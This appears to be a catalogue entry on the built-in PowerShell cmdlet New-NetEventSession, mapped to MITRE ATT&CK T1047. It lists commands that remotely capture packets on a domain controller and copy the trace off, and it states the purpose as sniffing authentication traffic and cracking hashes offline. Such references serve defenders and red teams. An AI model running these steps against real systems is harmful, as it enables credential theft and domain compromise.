.. / New-NetEventSession

Creates a network event session

Functions:	Network
Type:	Cmdlets
Toolsets:	Builtin CIMSession

Resources

https://github.com/microsoft/etl2pcapng

Network

Sniff traffic

New-NetEventSession -Name sess -CimSession $s -LocalFilePath "C:\Windows\Temp\Trace.etl" -CaptureMode SaveToFile
Add-NetEventPacketCaptureProvider -SessionName sess -CimSession $s -Level 4 -CaptureType Physical
Start-NetEventSession -Name sess -CimSession $s
Get-NetEventSession -Name sess -CimSession $s

Stop-NetEventSession -Name sess -CimSession $s
Remove-NetEventSession -Name sess -CimSession $s
Move-Item \\DC1.ad.bitsadmin.com\C$\Windows\Temp\Trace.etl C:\tmp

Usecase
Sniff authentication traffic on a domain controller and locally crack the hashes

Comments

Create CimSession $s using New-CimSession
Convert resulting .etl file to .pcapng using etl2pcapng
PowerShell Module: NetEventPacketCapture

Mitre Att&ck
T1047

Updated: 2023-07-01

Contributor: Arris Huijgen (bitsadmin)